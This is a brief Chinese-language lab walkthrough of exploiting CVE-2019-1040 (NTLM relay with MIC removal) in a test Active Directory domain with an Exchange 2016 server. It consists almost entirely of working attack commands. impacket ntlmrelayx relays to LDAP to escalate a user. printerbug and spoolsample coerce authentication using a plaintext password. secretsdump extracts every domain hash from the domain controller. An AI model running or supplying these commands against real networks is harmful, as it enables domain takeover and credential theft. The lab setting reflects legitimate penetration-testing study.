https://daiker.gitbook.io/windows-protocol/ntlm-pian/7#5-cve-2019-1040

环境

角色 系统 计算机名 地址
攻击机 kali 192.168.1.103
域控 windows2012R2 sync-dc 192.168.110.12 sync.net
exchange2016 windows2016 sync-ex2016 192.168.110.81 sync.net

利用条件

  • 在域内
    或者
  • 已知一个域用户的帐号或ntlm-hash

操作

攻击机开启中继

impacket-ntlmrelayx --escalate-user chenli -t ldap://192.168.110.12 -smb2support --remove-mic --delegate-access -debug

chenli 要提升权限的用户名

CVE-2019-1040

使用打印机bug

  • windows下
spoolsample.exe	exchangeIP 攻击机IP

CVE-2019-1040

  • kali下
python3 printerbug.py sync.net/chenli:cl123\!\@\#45@192.168.110.81 192.168.1.103

CVE-2019-1040

  • 中继"提权"中
    CVE-2019-1040

dumpHASH

  • windows下
secretsdump.exe sync.net/chenli@sync-dc -just-dc

CVE-2019-1040

  • kali下
impacket-secretsdump -just-dc sync.net/chenli@192.168.110.12

CVE-2019-1040

相关文章:

  • 2021-10-20
  • 2021-04-09
  • 2021-07-03
  • 2021-12-30
  • 2021-06-18
  • 2021-06-27
  • 2021-09-04
  • 2021-08-09
猜你喜欢
  • 2021-12-15
  • 2022-02-19
  • 2021-04-07
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案